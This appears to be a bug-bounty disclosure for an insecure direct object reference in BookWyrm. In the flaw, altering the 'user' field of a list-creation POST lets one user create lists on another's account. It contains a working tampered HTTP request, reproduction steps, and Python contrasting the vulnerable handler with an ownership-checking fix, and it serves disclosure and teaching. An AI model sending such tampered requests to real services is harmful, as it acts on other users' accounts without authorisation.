Insecure Direct Object References when creating a list in bookwyrm-social/bookwyrm

Valid

Reported on Jul 18th 2022

Description

An insecure direct object reference when creating a list allows one user to create a new list on behalf of another.

Proof of Concept

POST /list HTTP/2
Host: bookwyrm.social
Cookie: django_language=None; csrftoken=I5lj4znBJ9B5HnT3FAsII67G1EISidIKGlsIz5ElN9kmlDwucM2hGKx0Fy4gM8vj; sessionid=kskbj9mmxksyiaqyup8tsri8zrh6x0xi
Content-Length: 158
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://bookwyrm.social
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://bookwyrm.social/user/<user1>/lists
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

csrfmiddlewaretoken=z1U84ZsGwubuTiOAGXssNXkAfZ7KbII6xh1xzvJqAuULxyr1d921LBKUTTt8FDvF&user=<user2_id>&name=testname&description=testdes&curation=closed&privacy=public

Steps to reproduce

1. Log in with the user1 account, then go to the Profile page.
2. Go to the Lists tab, then create a new list.
3. Intercept the request. In the body content, change the value of user from user1_id to user2_id, then forward the request.
4. You will see that a new list is created in the user2 account instead of the user1 account.

Impact

This vulnerability allows a user to create a list on other users' accounts, affecting the logic of the application.
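
The pattern this report describes, next to a server-side ownership check, as an added example that is not BookWyrm's code or the merged fix. The handler names, the in-memory `LISTS` store and the user ids 1 and 2 are assumptions made for illustration.

```python
from urllib.parse import parse_qs

class Forbidden(Exception):
    """Raised when the submitted owner is not the authenticated user."""

LISTS = []  # hypothetical stand-in for the table that stores lists

def parse_form(body: str) -> dict:
    # Flatten an application/x-www-form-urlencoded body to single values
    return {key: values[0] for key, values in parse_qs(body).items()}

def create_list_vulnerable(session_user_id: int, body: str) -> dict:
    # Reported pattern: the owner is read from the client-controlled "user" field
    form = parse_form(body)
    record = {"owner": int(form["user"]), "name": form["name"], "privacy": form["privacy"]}
    LISTS.append(record)
    return record

def create_list_hardened(session_user_id: int, body: str) -> dict:
    # The owner is taken from the authenticated session; a "user" field that
    # names anyone else is rejected, which also gives a clear event to log
    form = parse_form(body)
    claimed = form.get("user")
    if claimed is not None and claimed != str(session_user_id):
        raise Forbidden(f"user {session_user_id} submitted owner {claimed}")
    record = {"owner": session_user_id, "name": form["name"], "privacy": form["privacy"]}
    LISTS.append(record)
    return record

# Constructed bodies shaped like the one in the report; ids 1 and 2 are sample values
USER1, USER2 = 1, 2
TAMPERED = "user=2&name=testname&description=testdes&curation=closed&privacy=public"
HONEST = "user=1&name=testname&description=testdes&curation=closed&privacy=public"

def demo() -> dict:
    # user1 is logged in for all three requests
    results = {"vulnerable_owner": create_list_vulnerable(USER1, TAMPERED)["owner"]}
    try:
        create_list_hardened(USER1, TAMPERED)
        results["hardened_rejected"] = False
    except Forbidden:
        results["hardened_rejected"] = True
    results["hardened_owner"] = create_list_hardened(USER1, HONEST)["owner"]
    return results

if __name__ == "__main__":
    print(demo())
```
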

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. (16 days ago)
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back. (15 days ago)
We have sent a follow up to the bookwyrm-social/bookwyrm team. We will try again in 7 days. (12 days ago)
Mouse Reeve validated this vulnerability. (6 days ago)
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on 41b20c. (6 days ago)
The fix bounty has been dropped
form.html#L1-L116 has been validated
list.py#L23-L176 has been validated
create_form.html#L1-L12 has been validated